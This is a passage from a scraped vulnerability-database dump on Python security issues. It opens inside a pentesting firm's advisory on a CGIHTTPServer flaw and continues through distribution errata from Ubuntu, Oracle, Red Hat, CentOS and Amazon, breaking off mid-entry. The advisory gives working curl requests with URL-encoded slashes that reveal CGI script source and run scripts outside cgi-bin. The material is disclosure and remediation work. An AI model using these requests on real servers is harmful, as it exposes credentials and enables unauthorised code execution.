CGIHTTPServer\r\nimport BaseHTTPServer\r\n\r\nif __name__ == "__main__":\r\n server = BaseHTTPServer.HTTPServer\r\n handler = CGIHTTPServer.CGIHTTPRequestHandler\r\n server_address = ("", 8000)\r\n # Note that only /cgi-bin will work:\r\n handler.cgi_directories = ["/cgi-bin", "/cgi-bin/subdir"]\r\n httpd = server(server_address, handler)\r\n httpd.serve_forever()\r\n------------------------------------------------------------------------\r\n\r\nThis server should execute any scripts located in the subdirectory\r\n"cgi-bin". A sample CGI script can be placed in that directory, for\r\nexample a script like the following:\r\n\r\n------------------------------------------------------------------------\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = "SECRET"\r\nsys.stdout.write("Content-type: text/json\r\n\r\n")\r\nsys.stdout.write(json.dumps({"text": "This is a Test"}))\r\n------------------------------------------------------------------------\r\n\r\nThe Python library CGIHTTPServer.py implements the CGIHTTPRequestHandler\r\nclass which inherits from SimpleHTTPServer.SimpleHTTPRequestHandler:\r\n\r\nclass SimpleHTTPRequestHandler(BaseHTTPServer.BaseHTTPRequestHandler):\r\n[...]\r\n def do_GET(self):\r\n """Serve a GET request."""\r\n f = self.send_head()\r\n if f:\r\n try:\r\n self.copyfile(f, self.wfile)\r\n finally:\r\n f.close()\r\n\r\n def do_HEAD(self):\r\n """Serve a HEAD request."""\r\n f = self.send_head()\r\n if f:\r\n f.close()\r\n\r\n def translate_path(self, path):\r\n [...]\r\n path = posixpath.normpath(urllib.unquote(path))\r\n words = path.split('/')\r\n words = filter(None, words)\r\n path = os.getcwd()\r\n [...]\r\n\r\nThe CGIHTTPRequestHandler class inherits, among others, the methods\r\ndo_GET() and do_HEAD() for handling HTTP GET and HTTP HEAD requests. The\r\nclass overrides send_head() and implements several new methods, such as\r\ndo_POST(), is_cgi() and run_cgi():\r\n\r\nclass CGIHTTPRequestHandler(SimpleHTTPServer.SimpleHTTPRequestHandler):\r\n[...]\r\n def do_POST(self):\r\n [...]\r\n if self.is_cgi():\r\n self.run_cgi()\r\n else:\r\n self.send_error(501, "Can only POST to CGI scripts")\r\n\r\n def send_head(self):\r\n """Version of send_head that support CGI scripts"""\r\n if self.is_cgi():\r\n return self.run_cgi()\r\n else:\r\n return SimpleHTTPServer.SimpleHTTPRequestHandler.send_head(self)\r\n\r\n def is_cgi(self):\r\n [...]\r\n collapsed_path = _url_collapse_path(self.path)\r\n dir_sep = collapsed_path.find('/', 1)\r\n head, tail = collapsed_path[:dir_sep], collapsed_path[dir_sep+1:]\r\n if head in self.cgi_directories:\r\n self.cgi_info = head, tail\r\n return True\r\n return False\r\n[...]\r\n def run_cgi(self):\r\n """Execute a CGI script."""\r\n dir, rest = self.cgi_info\r\n\r\n [...]\r\n\r\n # dissect the part after the directory name into a script name &\r\n # a possible additional path, to be stored in PATH_INFO.\r\n i = rest.find('/')\r\n if i >= 0:\r\n script, rest = rest[:i], rest[i:]\r\n else:\r\n script, rest = rest, ''\r\n\r\n scriptname = dir + '/' + script\r\n scriptfile = self.translate_path(scriptname)\r\n if not os.path.exists(scriptfile):\r\n self.send_error(404, "No such CGI script (%r)" % scriptname)\r\n return\r\n if not os.path.isfile(scriptfile):\r\n self.send_error(403, "CGI script is not a plain file (%r)" %\r\n scriptname)\r\n return\r\n [...]\r\n[...]\r\n\r\nFor HTTP GET requests, do_GET() first invokes send_head(). That method\r\ncalls is_cgi() to determine whether the requested path is to be executed\r\nas a CGI script. The is_cgi() method uses _url_collapse_path() to\r\nnormalize the path, i.e. remove extraneous slashes (/),current directory\r\n(.), or parent directory (..) elements, taking care not to permit\r\ndirectory traversal below the document root. The is_cgi() function\r\nreturns True when the first path element is contained in the\r\ncgi_directories list. As _url_collaps_path() and is_cgi() never URL\r\ndecode the path, replacing the forward slash after the CGI directory in\r\nthe URL to a CGI script with the URL encoded variant %2f leads to\r\nis_cgi() returning False. This will make CGIHTTPRequestHandler's\r\nsend_head() then invoke its parent's send_head() method which translates\r\nthe URL path to a file system path using the translate_path() method and\r\nthen outputs the file's contents raw. As translate_path() URL decodes\r\nthe path, this then succeeds and discloses the CGI script's file\r\ncontents:\r\n\r\n$ curl http://localhost:8000/cgi-bin%2ftest.py\r\n#!/usr/bin/env python2\r\nimport json\r\nimport sys\r\n\r\ndb_credentials = "SECRET"\r\nsys.stdout.write("Content-type: text/json\r\n\r\n")\r\nsys.stdout.write(json.dumps({"text": "This is a Test"}))\r\n\r\nSimilarly, the CGIHTTPRequestHandler can be tricked into executing CGI\r\nscripts that would normally not be executable. The class normally only\r\nallows executing CGI scripts that are direct children of one of the\r\ndirectories listed in cgi_directories. Furthermore, only direct\r\nsubdirectories of the document root (the current working directory) can\r\nbe valid CGI directories.\r\n\r\nThis can be seen in the following example. Even though the sample server\r\nshown above includes "/cgi-bin/subdir" as part of the request handler's\r\ncgi_directories, a CGI script named test.py in that directory is not\r\nexecuted:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir/test.py\r\n[...]\r\n<p>Error code 403.\r\n<p>Message: CGI script is not a plain file ('/cgi-bin/subdir').\r\n[...]\r\n\r\nHere, is_cgi() set self.cgi_info to ('/cgi-bin', 'subdir/test.py') and\r\nreturned True. Next, run_cgi() further dissected these paths to perform\r\nsome sanity checks, thereby mistakenly assuming subdir to be the\r\nexecutable script's filename and test.py to be path info. As subdir is\r\nnot an executable file, run_cgi() returns an error message. However, if\r\nthe forward slash between subdir and test.py is replaced with %2f,\r\ninvoking the script succeeds:\r\n\r\n$ curl http://localhost:8000/cgi-bin/subdir%2ftest.py\r\n{"text": "This is a Test"}\r\n\r\nThis is because neither is_cgi() nor run_cgi() URL decode the path\r\nduring processing until run_cgi() tries to determine whether the target\r\nscript is an executable file. More specifically, as subdir%2ftest.py\r\ndoes not contain a forward slash, it is not split into the script name\r\nsubdir and path info test.py, as in the previous example.\r\n\r\nSimilarly, using URL encoded forward slashes, executables outside of a\r\nCGI directory can be executed:\r\n\r\n$ curl http://localhost:8000/cgi-bin/..%2ftraversed.py\r\n{"text": "This is a Test"}\r\n\r\n\r\nWorkaround\r\n==========\r\n\r\nSubclass CGIHTTPRequestHandler and override the is_cgi() method with a\r\nvariant that first URL decodes the supplied path, for example:\r\n\r\nclass FixedCGIHTTPRequestHandler(CGIHTTPServer.CGIHTTPRequestHandler):\r\n def is_cgi(self):\r\n self.path = urllib.unquote(self.path)\r\n return CGIHTTPServer.CGIHTTPRequestHandler.is_cgi(self)\r\n\r\n\r\nFix\r\n===\r\n\r\nUpdate to the latest Python version from the Mercurial repository at\r\nhttp://hg.python.org/cpython/\r\n\r\n\r\nSecurity Risk\r\n=============\r\n\r\nThe vulnerability can be used to gain access to the contents of CGI\r\nbinaries or the source code of CGI scripts. This may reveal sensitve\r\ninformation, for example access credentials. This can greatly help\r\nattackers in mounting further attacks and is therefore considered to\r\npose a high risk. Furthermore attackers may be able to execute code that\r\nwas not intended to be executed. However, this is limited to files\r\nstored in the server's working directory or in its subdirectories.\r\n\r\nThe CGIHTTPServer code does contain this warning:\r\n"SECURITY WARNING: DON'T USE THIS CODE UNLESS YOU ARE INSIDE A FIREWALL"\r\nEven when used on a local computer this may allow other local users to\r\nexecute code in the context of another user.\r\n\r\n\r\nTimeline\r\n========\r\n\r\n2014-04-07 Vulnerability identified\r\n2014-06-11 Customer approved disclosure to vendor\r\n2014-06-11 Vendor notified\r\n2014-06-15 Vendor disclosed vulnerability in their public bug tracker\r\n and addressed it in public source code repository\r\n2014-06-23 CVE number requested\r\n2014-06-25 CVE number assigned\r\n2014-06-26 Advisory released\r\n\r\n\r\nReferences\r\n==========\r\n\r\nhttp://bugs.python.org/issue21766\r\n\r\n\r\nRedTeam Pentesting GmbH\r\n=======================\r\n\r\nRedTeam Pentesting offers individual penetration tests, short pentests,\r\nperformed by a team of specialised IT-security experts. Hereby, security\r\nweaknesses in company networks or products are uncovered and can be\r\nfixed immediately.\r\n\r\nAs there are only few experts in this field, RedTeam Pentesting wants to\r\nshare its knowledge and enhance the public knowledge with research in\r\nsecurity related areas. The results are made available as public\r\nsecurity advisories.\r\n\r\nMore information about RedTeam Pentesting can be found at\r\nhttps://www.redteam-pentesting.de.\r\n\r\n\r\n-- RedTeam Pentesting GmbH Tel.: +49 241 510081-0 Dennewartstr. 25-27 Fax : +49 241 510081-99 52068 Aachen https://www.redteam-pentesting.de Germany Registergericht: Aachen HRB 14004 Geschaftsfuhrer: Patrick Hof, Jens Liebchen\r\n\r\n", "edition": 1, "modified": "2014-10-15T00:00:00", "published": "2014-10-15T00:00:00", "id": "SECURITYVULNS:DOC:31253", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:31253", "title": "[RT-SA-2014-008] Python CGIHTTPServer File Disclosure and Potential Code Execution", "type": "securityvulns", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2018-08-31T11:09:52", "bulletinFamily": "software", "cvelist": ["CVE-2013-4238"], "description": "Invalid NULL characters processing.", "edition": 1, "modified": "2013-10-02T00:00:00", "published": "2013-10-02T00:00:00", "id": "SECURITYVULNS:VULN:13303", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:13303", "title": "Python SSL certificate check bypass", "type": "securityvulns", "cvss": {"score": 4.3, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:PARTIAL/A:NONE/"}}], "ubuntu": [{"lastseen": "2020-07-02T11:41:09", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "It was discovered that multiple Python protocol libraries incorrectly \nlimited certain data when connecting to servers. A malicious ftp, http, \nimap, nntp, pop or smtp server could use this issue to cause a denial of \nservice. (CVE-2013-1752)\n\nIt was discovered that the Python xmlrpc library did not limit unpacking \ngzip-compressed HTTP bodies. A malicious server could use this issue to \ncause a denial of service. (CVE-2013-1753)\n\nIt was discovered that the Python json module incorrectly handled a certain \nargument. An attacker could possibly use this issue to read arbitrary \nmemory and expose sensitive information. This issue only affected Ubuntu \n12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4616)\n\nIt was discovered that the Python CGIHTTPServer incorrectly handled \nURL-encoded path separators in URLs. A remote attacker could use this issue \nto expose sensitive information, or possibly execute arbitrary code. This \nissue only affected Ubuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-4650)\n\nIt was discovered that Python incorrectly handled sizes and offsets in \nbuffer functions. An attacker could possibly use this issue to read \narbitrary memory and obtain sensitive information. This issue only affected \nUbuntu 12.04 LTS and Ubuntu 14.04 LTS. (CVE-2014-7185)", "edition": 6, "modified": "2015-06-25T00:00:00", "published": "2015-06-25T00:00:00", "id": "USN-2653-1", "href": "https://ubuntu.com/security/notices/USN-2653-1", "title": "Python vulnerabilities", "type": "ubuntu", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-07-09T01:32:14", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Ryan Sleevi discovered that Python did not properly handle certificates \nwith NULL characters in the Subject Alternative Name field. An attacker \ncould exploit this to perform a man in the middle attack to view sensitive \ninformation or alter encrypted communications.", "edition": 5, "modified": "2013-10-01T00:00:00", "published": "2013-10-01T00:00:00", "id": "USN-1982-1", "href": "https://ubuntu.com/security/notices/USN-1982-1", "title": "Python 2.6 vulnerability", "type": "ubuntu", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "oraclelinux": [{"lastseen": "2020-02-27T14:37:55", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "[2.7.5-34.0.1]\n- Add Oracle Linux distribution in platform.py [orabug 20812544]\n[2.7.5-34]\n- Revert fix for rhbz#1117751 as it leads to regressions\nResolves: rhbz#1117751\n[2.7.5-33]\n- Only restore SIG_PIPE when Popen called with restore_sigpipe\nResolves: rhbz#1117751\n[2.7.5-32]\n- Backport SSLSocket.version function\n- Temporary disable test_gdb on ppc64le rhbz#1260558\nResolves: rhbz#1259421\n[2.7.5-31]\n- Update load_cert_chain function to accept None keyfile\nResolves: rhbz#1250611\n[2.7.5-30]\n- Change Patch224 according to latest update in PEP493\nResolves:rhbz#1219108\n[2.7.5-29]\n- Popen shouldn't ignore SIG_PIPE\nResolves: rhbz#1117751\n[2.7.5-28]\n- Exclude python subprocess temp files from cleaning\nResolves: rhbz#1058482\n[2.7.5-27]\n- Add list for cprofile sort option\nResolves:rhbz#1237107\n[2.7.5-26]\n- Add switch to toggle cert verification on or off globally\nResolves:rhbz#1219108\n[2.7.5-25]\n- PEP476 enable cert verifications by default\nResolves:rhbz#1219110\n[2.7.5-24]\n- Massive backport of ssl module from python3 aka PEP466\nResolves: rhbz#1111461\n[2.7.5-23]\n- Fixed CVE-2013-1753, CVE-2013-1752, CVE-2014-4616, CVE-2014-4650, CVE-2014-7185\nResolves: rhbz#1206574\n[2.7.5-22]\n- Fix importing readline producing erroneous output\nResolves: rhbz#1189301\n[2.7.5-21]\n- Add missing import in bdist_rpm\nResolves: rhbz#1177613\n[2.7.5-20]\n- Avoid double close of subprocess pipes\nResolves: rhbz#1103452\n[2.7.5-19]\n- make multiprocessing ignore EINTR\nResolves: rhbz#1181624", "edition": 5, "modified": "2015-11-23T00:00:00", "published": "2015-11-23T00:00:00", "id": "ELSA-2015-2101", "href": "http://linux.oracle.com/errata/ELSA-2015-2101.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:35:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-1912", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650"], "description": "python27\n[1.1-17]\n- Require python-pip and python-wheel (note: in rh-python34\n this is not necessary, because 'python' depends on these).\npython27-python\n[2.7.8-3]\n- Add httplib fix for CVE-2013-1752\nResolves: rhbz#1187779\n[2.7.8-2]\n- Fix %check\nunset DISPLAY\n setion not failing properly on failed test\n- Fixed CVE-2013-1752, CVE-2013-1753\nResolves: rhbz#1187779\n[2.7.8-1]\n- Update to 2.7.8.\nResolves: rhbz#1167912\n- Make python-devel depend on scl-utils-build.\nResolves: rhbz#1170993\npython27-python-pip\n - New Package added\npython27-python-setuptools\n[0.9.8-3]\n- Enhance patch restoring proxy support in SSL connections\nResolves: rhbz#1222507\npython27-python-simplejson\n[3.2.0-2]\n- Fix CVE-2014-461, add boundary checks\nResolves: rhbz#1222534\npython27-python-wheel\n - New Package added ", "edition": 4, "modified": "2016-02-04T00:00:00", "published": "2016-02-04T00:00:00", "id": "ELSA-2015-1064", "href": "http://linux.oracle.com/errata/ELSA-2015-1064.html", "title": "python27 security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-05-29T18:39:34", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "[2.6.6-51]\n- Fixed memory leak in _ssl._get_peer_alt_names\nResolves: rhbz#1002983\n[2.6.6-50]\n- Added fix for CVE-2013-4238\nResolves: rhbz#998784\n[2.6.6-49]\n- Fix shebangs in several files in python-tools subpackage\nResolves: rhbz#521898\n[2.6.6-48]\n- Fix sqlite3.Cursor.lastrowid under a Turkish locale.\nResolves: rhbz#841937\n[2.6.6-47]\n- Urlparse now parses query and fragment of urls for any scheme.\nResolves: rhbz#978129\n[2.6.6-46]\n- Add wrapper for select.select to restart a system call\nResolves: rhbz#948025\n[2.6.6-45]\n- Add try-except to catch OSError in WatchedFileHandler\nResolves: rhbz#919163\n[2.6.6-44]\n- Fix urandom to throw proper exception\nResolves: rhbz#893034\n[2.6.6-43]\n- Backport of collections.OrderedDict from Python 2.7\nResolves: rhbz#929258\n[2.6.6-42]\n- Add an explicit RPATH to _elementtree.so pointing at the directory\ncontaining system expat\nResolves: rhbz#962779\n[2.6.6-41]\n- Don't let failed incoming SSL connection stay open forever\nResolves: rhbz#960168\n[2.6.6-40]\n- Fix Python not reading Alternative Subject Names from some SSL\ncertificates\nResolves: rhbz#928390\n[2.6.6-39]\n- Remove BOM insertion code from SysLogHandler that causes messages to be\ntreated as EMERG level\nResolves: rhbz#845802\n[2.6.6-38]\n- move most of the payload of the core package to the libs subpackage, given\nthat the libs aren't meaningfully usable without the standard libraries\n- preserve timestamps when fixing shebangs (patch 158) and when installing,\nto minimize .pyc/.pyo differences across architectures (due to the embedded\nmtime in .pyc/.pyo headers)\n- fix multilib issue in /usr/bin/modulator and /usr/bin/pynche\nRelated: rhbz#958256", "edition": 4, "modified": "2013-11-26T00:00:00", "published": "2013-11-26T00:00:00", "id": "ELSA-2013-1582", "href": "http://linux.oracle.com/errata/ELSA-2013-1582.html", "title": "python security, bug fix, and enhancement update", "type": "oraclelinux", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:45:52", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-1912", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185"], "description": "Python is an interpreted, interactive, object-oriented programming language\nthat supports modules, classes, exceptions, high-level dynamic data types,\nand dynamic typing. The python27 collection provide a stable release of\nPython 2.7 with a number of additional utilities and database connectors\nfor MySQL and PostgreSQL.\n\nThe python27-python packages have been upgraded to upstream version 2.7.8,\nwhich provides numerous bug fixes over the previous version. (BZ#1167912)\n\nThe following security issues were fixed in the python27-python component:\n\nIt was discovered that the socket.recvfrom_into() function failed to check\nthe size of the supplied buffer. This could lead to a buffer overflow when\nthe function was called with an insufficiently sized buffer.\n(CVE-2014-1912)\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nThe following security issue was fixed in the python27-python and\npython27-python-simplejson components:\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nIn addition, this update adds the following enhancement:\n\n* The python27 Software Collection now includes the python-wheel and\npython-pip modules. (BZ#994189, BZ#1167902)\n\nAll python27 users are advised to upgrade to these updated packages, which\ncorrect these issues and add these enhancements. All running python27\ninstances must be restarted for this update to take effect.\n", "modified": "2018-06-13T01:28:19", "published": "2015-06-04T04:00:00", "id": "RHSA-2015:1064", "href": "https://access.redhat.com/errata/RHSA-2015:1064", "type": "redhat", "title": "(RHSA-2015:1064) Moderate: python27 security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2020-02-27T11:34:32", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1752", "CVE-2013-1753", "CVE-2014-4616", "CVE-2014-4650", "CVE-2014-7185", "CVE-2014-9365"], "description": "Python is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.", "modified": "2018-04-12T03:32:44", "published": "2015-11-19T18:41:01", "id": "RHSA-2015:2101", "href": "https://access.redhat.com/errata/RHSA-2015:2101", "type": "redhat", "title": "(RHSA-2015:2101) Moderate: python security, bug fix, and enhancement update", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-08-13T18:45:57", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "Python is an interpreted, interactive, object-oriented programming\nlanguage.\n\nA flaw was found in the way the Python SSL module handled X.509 certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThese updated python packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll users of python are advised to upgrade to these updated packages, which\nfix these issues and add this enhancement.\n", "modified": "2018-06-06T20:24:26", "published": "2013-11-21T05:00:00", "id": "RHSA-2013:1582", "href": "https://access.redhat.com/errata/RHSA-2013:1582", "type": "redhat", "title": "(RHSA-2013:1582) Moderate: python security, bug fix, and enhancement update", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "centos": [{"lastseen": "2020-02-27T14:39:33", "bulletinFamily": "unix", "cvelist": ["CVE-2013-1753", "CVE-2014-7185", "CVE-2014-4616", "CVE-2013-1752", "CVE-2014-4650", "CVE-2014-9365"], "description": "**CentOS Errata and Security Advisory** CESA-2015:2101\n\n\nPython is an interpreted, interactive, object-oriented programming language\noften compared to Tcl, Perl, Scheme, or Java. Python includes modules,\nclasses, exceptions, very high level dynamic data types and dynamic typing.\nPython supports interfaces to many system calls and libraries, as well as\nto various windowing systems (X11, Motif, Tk, Mac and MFC).\n\nIt was discovered that the Python xmlrpclib module did not restrict the\nsize of gzip-compressed HTTP responses. A malicious XMLRPC server could\ncause an XMLRPC client using xmlrpclib to consume an excessive amount of\nmemory. (CVE-2013-1753)\n\nIt was discovered that multiple Python standard library modules\nimplementing network protocols (such as httplib or smtplib) failed to\nrestrict the sizes of server responses. A malicious server could cause a\nclient using one of the affected modules to consume an excessive amount of\nmemory. (CVE-2013-1752)\n\nIt was discovered that the CGIHTTPServer module incorrectly handled URL\nencoded paths. A remote attacker could use this flaw to execute scripts\noutside of the cgi-bin directory, or disclose the source code of the\nscripts in the cgi-bin directory. (CVE-2014-4650)\n\nAn integer overflow flaw was found in the way the buffer() function handled\nits offset and size arguments. An attacker able to control these arguments\ncould use this flaw to disclose portions of the application memory or cause\nit to crash. (CVE-2014-7185)\n\nA flaw was found in the way the json module handled negative index\narguments passed to certain functions (such as raw_decode()). An attacker\nable to control the index value passed to one of the affected functions\ncould possibly use this flaw to disclose portions of the application\nmemory. (CVE-2014-4616)\n\nThe Python standard library HTTP client modules (such as httplib or urllib)\ndid not perform verification of TLS/SSL certificates when connecting to\nHTTPS servers. A man-in-the-middle attacker could use this flaw to hijack\nconnections and eavesdrop or modify transferred data. (CVE-2014-9365)\n\nNote: The Python standard library was updated to make it possible to enable\ncertificate verification by default. However, for backwards compatibility,\nverification remains disabled by default. Future updates may change this\ndefault. Refer to the Knowledgebase article 2039753 linked to in the\nReferences section for further details about this change. (BZ#1219108)\n\nThis update also fixes the following bugs:\n\n* Subprocesses used with the Eventlet library or regular threads previously\ntried to close epoll file descriptors twice, which led to an \"Invalid\nargument\" error. Subprocesses have been fixed to close the file descriptors\nonly once. (BZ#1103452)\n\n* When importing the readline module from a Python script, Python no longer\nproduces erroneous random characters on stdout. (BZ#1189301)\n\n* The cProfile utility has been fixed to print all values that the \"-s\"\noption supports when this option is used without a correct value.\n(BZ#1237107)\n\n* The load_cert_chain() function now accepts \"None\" as a keyfile argument.\n(BZ#1250611)\n\nIn addition, this update adds the following enhancements:\n\n* Security enhancements as described in PEP 466 have been backported to the\nPython standard library, for example, new features of the ssl module:\nServer Name Indication (SNI) support, support for new TLSv1.x protocols,\nnew hash algorithms in the hashlib module, and many more. (BZ#1111461)\n\n* Support for the ssl.PROTOCOL_TLSv1_2 protocol has been added to the ssl\nlibrary. (BZ#1192015)\n\n* The ssl.SSLSocket.version() method is now available to access information\nabout the version of the SSL protocol used in a connection. (BZ#1259421)\n\nAll python users are advised to upgrade to these updated packages, which\ncontain backported patches to correct these issues and add these\nenhancements.\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html\n\n**Affected packages:**\npython\npython-debug\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2015-2101.html", "edition": 4, "modified": "2015-11-30T19:48:49", "published": "2015-11-30T19:48:49", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2015-November/008760.html", "id": "CESA-2015:2101", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2019-12-20T18:28:21", "bulletinFamily": "unix", "cvelist": ["CVE-2013-4238"], "description": "**CentOS Errata and Security Advisory** CESA-2013:1582\n\n\nPython is an interpreted, interactive, object-oriented programming\nlanguage.\n\nA flaw was found in the way the Python SSL module handled X.509 certificate\nfields that contain a NULL byte. An attacker could potentially exploit this\nflaw to conduct man-in-the-middle attacks to spoof SSL servers. Note that\nto exploit this issue, an attacker would need to obtain a carefully crafted\ncertificate signed by an authority that the client trusts. (CVE-2013-4238)\n\nThese updated python packages include numerous bug fixes and one\nenhancement. Space precludes documenting all of these changes in this\nadvisory. Users are directed to the Red Hat Enterprise Linux 6.5 Technical\nNotes, linked to in the References, for information on the most significant\nof these changes.\n\nAll users of python are advised to upgrade to these updated packages, which\nfix these issues and add this enhancement.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-cr-announce/2013-November/007256.html\n\n**Affected packages:**\npython\npython-devel\npython-libs\npython-test\npython-tools\ntkinter\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2013-1582.html", "edition": 3, "modified": "2013-11-26T13:32:42", "published": "2013-11-26T13:32:42", "href": "http://lists.centos.org/pipermail/centos-cr-announce/2013-November/007256.html", "id": "CESA-2013:1582", "title": "python, tkinter security update", "type": "centos", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:35:29", "bulletinFamily": "unix", "cvelist": ["CVE-2014-4616"], "description": "**Issue Overview:**\n\nIt was [reported](<http://bugs.python.org/issue21529>) that Python built-in _json module have a flaw (insufficient bounds checking), which allows a local user to read current process' arbitrary memory.\n\nQuoting the upstream bug report:\n\n_The sole prerequisites of this attack are that the attacker is able to control or influence the two parameters of the default scanstring function: the string to be decoded and the index.\n\nThe bug is caused by 